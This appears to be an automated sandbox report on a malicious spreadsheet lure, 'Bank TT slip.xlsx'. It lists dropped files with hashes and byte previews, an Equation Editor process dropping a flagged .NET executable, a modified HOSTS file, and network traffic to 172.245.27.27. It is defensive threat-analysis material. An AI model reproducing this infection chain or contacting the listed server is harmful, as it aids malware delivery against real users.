                          Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                          Category:dropped
                          Size (bytes):4396
                          Entropy (8bit):7.884233298494423
                          Encrypted:false
                          SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                          MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                          SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                          SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                          SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                          Malicious:false
                          Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):11303
                          Entropy (8bit):7.909402464702408
                          Encrypted:false
                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                          Malicious:false
                          Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):10202
                          Entropy (8bit):7.870143202588524
                          Encrypted:false
                          SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                          MD5:66EF10508ED9AE9871D59F267FBE15AA
                          SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                          SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                          SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                          Malicious:false
                          Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):10202
                          Entropy (8bit):7.870143202588524
                          Encrypted:false
                          SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                          MD5:66EF10508ED9AE9871D59F267FBE15AA
                          SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                          SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                          SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                          Malicious:false
                          Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):2647
                          Entropy (8bit):7.8900124483490135
                          Encrypted:false
                          SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                          MD5:E46357D82EBC866EEBDA98FA8F94B385
                          SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                          SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                          SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                          Category:dropped
                          Size (bytes):4396
                          Entropy (8bit):7.884233298494423
                          Encrypted:false
                          SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                          MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                          SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                          SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                          SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):5396
                          Entropy (8bit):7.915293088075047
                          Encrypted:false
                          SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                          MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                          SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                          SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                          SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):5396
                          Entropy (8bit):7.915293088075047
                          Encrypted:false
                          SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                          MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                          SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                          SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                          SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):11303
                          Entropy (8bit):7.909402464702408
                          Encrypted:false
                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:CDFV2 Encrypted
                          Category:dropped
                          Size (bytes):53760
                          Entropy (8bit):7.842540370584659
                          Encrypted:false
                          SSDEEP:768:kqmuNsZ9NhvSSQDqAAtBMTB/FwedrZKvN6lEq+2+SVj+PAaBQeqruUlEWymcfl/q:kqhq5L0qBM9SML+SVjcHBtH9JIN
                          MD5:2391E6AA319CBA9248661674AC5F2105
                          SHA1:BBDB700FD74488CC9F3F3E4D66DE6B1321EE94B0
                          SHA-256:18FA3E8547F1B76B8A53B1169C4B3ED78F1A3EFB77163E0698AE3B1FAF7EFB71
                          SHA-512:973ACE3991EB226F6E6242316860EA1803A6CC192F6006951E3DB1505503609C39B1F9C8CEDB13C74A39CE0998CD452440975DB2FC3B76D2E8A682CA433BF718
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):833024
                          Entropy (8bit):7.018221482722969
                          Encrypted:false
                          SSDEEP:12288:7HE2ISZ5m4fuOjUTPXmkHz/b9m+DhLrRvoXSf+bnl8tTac2aVzBQXOCmxqogCSsV:b3NUXmkTjZFRvoCmblML
                          MD5:F18604D5FC3E2930E85C403E0E80A459
                          SHA1:AA0517C10C333F9A9A64EBA154EA915464EBF2BB
                          SHA-256:46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                          SHA-512:C39BD01BCA62779434B0508BC66972CD7030153469F631B425E1B77AF59FD7DB1A26A837EA2B7440C9F93CD538C43C2F2005EBCF34B982C03CEED71A4C3B685C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 46%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|b..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............?...........f...............................................*..(#...*&..($....*.s%........s&........s'........s(........s)........*Z........o1...........*&..(2....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{..
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):835
                          Entropy (8bit):4.694294591169137
                          Encrypted:false
                          SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                          MD5:6EB47C1CF858E25486E42440074917F2
                          SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                          SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                          SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                          Malicious:true
                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                          File type:CDFV2 Encrypted
                          Entropy (8bit):7.842540370584659
                          TrID:
                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                          File name:Bank TT slip.xlsx
                          File size:53760
                          MD5:2391e6aa319cba9248661674ac5f2105
                          SHA1:bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
                          SHA256:18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
                          SHA512:973ace3991eb226f6e6242316860ea1803a6cc192f6006951e3db1505503609c39b1f9c8cedb13c74a39ce0998cd452440975db2fc3b76d2e8a682ca433bf718
                          SSDEEP:768:kqmuNsZ9NhvSSQDqAAtBMTB/FwedrZKvN6lEq+2+SVj+PAaBQeqruUlEWymcfl/q:kqhq5L0qBM9SML+SVjcHBtH9JIN
                          TLSH:F133BE6B63B6A1ACD83E71BBF113CD36CB0E7D21D20DD9091811B24D84BE8568B527F6
                          Icon Hash:e4e2aa8aa4b4bcb4
                           Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                           May 13, 2022 16:58:18.558007956 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.672775984 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.672893047 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.682598114 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802066088 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802112103 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802135944 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802158117 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802159071 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802184105 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802185059 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802189112 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802210093 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802232981 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802233934 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802238941 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802253962 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802264929 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802274942 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802287102 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802298069 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.802306890 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.802340031 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.849416018 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.916913033 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.916958094 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.916985035 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917009115 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917035103 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917059898 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917061090 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917084932 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917085886 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917089939 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917109966 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917110920 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917130947 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917136908 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917148113 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917161942 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917170048 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917185068 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917198896 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917210102 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917218924 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917234898 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917251110 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917258024 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917269945 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917283058 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917299032 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917306900 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917320013 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917331934 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917339087 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917355061 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917370081 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917380095 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917387962 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917404890 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:18.917417049 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.917435884 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:18.924132109 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032015085 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032058954 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032084942 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032097101 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032114983 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032125950 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032143116 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032144070 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032155991 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032172918 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032181978 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032201052 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032207966 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032228947 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032238960 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032257080 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032263994 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032284975 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032298088 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032311916 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032334089 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032366991 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032375097 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032392979 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032402039 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032418966 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032426119 CEST  49171        80         192.168.2.22   172.245.27.27
